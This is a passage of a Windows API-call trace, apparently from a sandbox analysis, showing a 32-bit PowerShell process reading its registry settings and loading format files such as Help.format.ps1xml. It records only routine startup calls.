RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e488 | out: phkResult=0x13e488*=0x324) returned 0x0 [0089.823] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e4d0, lpData=0x0, lpcbData=0x13e4cc*=0x0 | out: lpType=0x13e4d0*=0x1, lpData=0x0, lpcbData=0x13e4cc*=0x56) returned 0x0 [0089.823] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e4d0, lpData=0x3953b0, lpcbData=0x13e4cc*=0x56 | out: lpType=0x13e4d0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x13e4cc*=0x56) returned 0x0 [0089.823] RegCloseKey (hKey=0x324) returned 0x0 [0089.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0089.823] GetLastError () returned 0x0 [0089.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13dfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0089.823] GetLastError () returned 0x0 [0089.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.824] GetLastError () returned 0x0 [0089.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.824] GetLastError () returned 0x0 [0089.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.824] GetLastError () returned 0x0 [0089.824] VirtualQuery (in: lpAddress=0x13d1e0, lpBuffer=0x13e1e0, dwLength=0x1c | out: lpBuffer=0x13e1e0*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.824] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x6b99a079, Data2=0x643e, Data3=0x47d4, Data4=([0]=0xac, [1]=0x63, [2]=0xec, [3]=0x9e, [4]=0x60, [5]=0xb5, [6]=0x27, [7]=0x9c))) returned 0x0 [0089.825] VirtualQuery (in: lpAddress=0x13d230, lpBuffer=0x13e230, dwLength=0x1c | out: lpBuffer=0x13e230*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.825] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x9c9b470f, Data2=0xdf27, Data3=0x4b36, Data4=([0]=0xb7, [1]=0xc1, [2]=0x8c, [3]=0xff, [4]=0xa9, [5]=0x5, [6]=0xa2, [7]=0x65))) returned 0x0 [0089.825] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xdd616a99, Data2=0x9644, Data3=0x406e, Data4=([0]=0x82, [1]=0x45, [2]=0x2a, [3]=0x58, [4]=0xf0, [5]=0xf, [6]=0xc6, [7]=0x61))) returned 0x0 [0089.825] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x9b94b550, Data2=0x7f46, Data3=0x4f22, Data4=([0]=0x81, [1]=0x1d, [2]=0x68, [3]=0x55, [4]=0x2d, [5]=0x4d, [6]=0xc4, [7]=0x6f))) returned 0x0 [0089.825] VirtualQuery (in: lpAddress=0x13d230, lpBuffer=0x13e230, dwLength=0x1c | out: lpBuffer=0x13e230*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.825] VirtualQuery (in: lpAddress=0x13d230, lpBuffer=0x13e230, dwLength=0x1c | out: lpBuffer=0x13e230*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13df9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0089.826] GetLastError () returned 0x0 [0089.826] SetErrorMode (uMode=0x1) returned 0x1 [0089.826] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324 [0089.826] GetLastError () returned 0x0 [0089.826] GetFileType (hFile=0x324) returned 0x1 [0089.826] SetErrorMode (uMode=0x1) returned 0x1 [0089.826] GetFileType (hFile=0x324) returned 0x1 [0089.826] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.827] GetLastError () returned 0x0 [0089.828] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.828] GetLastError () returned 0x0 [0089.828] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.828] GetLastError () returned 0x0 [0089.828] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.828] GetLastError () returned 0x0 [0089.828] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.828] GetLastError () returned 0x0 [0089.829] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.829] GetLastError () returned 0x0 [0089.829] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.829] GetLastError () returned 0x0 [0089.829] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.829] GetLastError () returned 0x0 [0089.830] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.830] GetLastError () returned 0x0 [0089.830] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.830] GetLastError () returned 0x0 [0089.830] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.830] GetLastError () returned 0x0 [0089.830] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.830] GetLastError () returned 0x0 [0089.830] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.830] GetLastError () returned 0x0 [0089.830] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.831] GetLastError () returned 0x0 [0089.831] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.831] GetLastError () returned 0x0 [0089.831] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.831] GetLastError () returned 0x0 [0089.833] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.833] GetLastError () returned 0x0 [0089.833] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.833] GetLastError () returned 0x0 [0089.833] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.833] GetLastError () returned 0x0 [0089.833] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.833] GetLastError () returned 0x0 [0089.833] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.833] GetLastError () returned 0x0 [0089.833] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.833] GetLastError () returned 0x0 [0089.834] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.834] GetLastError () returned 0x0 [0089.834] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.834] GetLastError () returned 0x0 [0089.834] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.834] GetLastError () returned 0x0 [0089.834] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.834] GetLastError () returned 0x0 [0089.834] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.834] GetLastError () returned 0x0 [0089.834] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.834] GetLastError () returned 0x0 [0089.835] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.835] GetLastError () returned 0x0 [0089.835] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.835] GetLastError () returned 0x0 [0089.835] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.835] GetLastError () returned 0x0 [0089.835] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.835] GetLastError () returned 0x0 [0089.838] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.838] GetLastError () returned 0x0 [0089.838] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.838] GetLastError () returned 0x0 [0089.838] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.838] GetLastError () returned 0x0 [0089.838] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.838] GetLastError () returned 0x0 [0089.838] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.838] GetLastError () returned 0x0 [0089.839] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.839] GetLastError () returned 0x0 [0089.839] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.839] GetLastError () returned 0x0 [0089.839] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.839] GetLastError () returned 0x0 [0089.839] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.839] GetLastError () returned 0x0 [0089.839] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.839] GetLastError () returned 0x0 [0089.839] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.839] GetLastError () returned 0x0 [0089.839] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.839] GetLastError () returned 0x0 [0089.840] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.840] GetLastError () returned 0x0 [0089.840] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.840] GetLastError () returned 0x0 [0089.840] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.840] GetLastError () returned 0x0 [0089.840] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.840] GetLastError () returned 0x0 [0089.840] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.840] GetLastError () returned 0x0 [0089.840] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.840] GetLastError () returned 0x0 [0089.840] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.840] GetLastError () returned 0x0 [0089.841] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.841] GetLastError () returned 0x0 [0089.841] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.841] GetLastError () returned 0x0 [0089.841] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.841] GetLastError () returned 0x0 [0089.841] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.841] GetLastError () returned 0x0 [0089.841] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.841] GetLastError () returned 0x0 [0089.841] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.841] GetLastError () returned 0x0 [0089.841] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.841] GetLastError () returned 0x0 [0089.842] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.842] GetLastError () returned 0x0 [0089.842] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.842] GetLastError () returned 0x0 [0089.842] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.842] GetLastError () returned 0x0 [0089.842] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.842] GetLastError () returned 0x0 [0089.842] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0xf37, lpOverlapped=0x0) returned 1 [0089.842] GetLastError () returned 0x0 [0089.842] ReadFile (in: hFile=0x324, lpBuffer=0x31bf977, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31bf977*, lpNumberOfBytesRead=0x13e504*=0x0, lpOverlapped=0x0) returned 1 [0089.842] GetLastError () returned 0x0 [0089.842] ReadFile (in: hFile=0x324, lpBuffer=0x31c02a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x31c02a0*, lpNumberOfBytesRead=0x13e504*=0x0, lpOverlapped=0x0) returned 1 [0089.842] GetLastError () returned 0x0 [0089.842] CloseHandle (hObject=0x324) returned 1 [0089.843] GetLastError () returned 0x0 [0089.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0089.843] GetLastError () returned 0x0 [0089.843] SetErrorMode (uMode=0x1) returned 0x1 [0089.843] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x31e129c | out: lpFileInformation=0x31e129c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0089.843] GetLastError () returned 0x0 [0089.843] SetErrorMode (uMode=0x1) returned 0x1 [0089.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0089.843] GetLastError () 